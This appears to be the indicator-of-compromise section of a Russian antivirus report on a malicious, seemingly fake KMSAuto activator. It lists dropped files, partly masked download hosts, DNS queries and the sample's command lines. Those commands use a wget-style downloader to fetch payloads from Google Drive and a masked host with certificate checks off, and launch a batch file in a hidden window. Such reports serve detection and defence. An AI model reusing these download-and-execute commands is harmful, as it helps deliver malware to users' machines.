Техническая информация
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\a_kb.bat
- %WINDIR%\s.txt
- %WINDIR%\w\libeay32.dll
- %WINDIR%\w\libiconv2.dll
- %WINDIR%\w\libintl3.dll
- %WINDIR%\w\libssl32.dll
- %WINDIR%\w\w.exe
- %WINDIR%\c\cu.exe
- %WINDIR%\n.exe
- %WINDIR%\kmsauto net.exe
- %WINDIR%\kmsauto.ini
- %APPDATA%\kbanditfull\kbanditfull.exe
- %WINDIR%\1r5zfvd-kl6s8odahdguzy5air5maprs7@e=download
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %WINDIR%\1r5zfvd-kl6s8odahdguzy5air5maprs7@e=download
- http://km#.#0g.host/r/b
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK km#.#0g.host
- '%APPDATA%\kbanditfull\kbanditfull.exe'
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "https://drive.google.com/u/0/uc?id=1r5ZfVD-KL6s8ODahDGUZy5AIr5maPRS7&export=download" --no-check-certificate
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "http://km#.#0g.host/r/b" --referer="0101010010" --user-agent="kbf"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_kb.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a_kb.bat" "